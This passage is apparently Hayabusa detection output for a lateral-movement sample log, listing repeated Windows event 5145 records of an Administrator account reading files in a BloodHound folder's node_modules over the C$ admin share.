Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 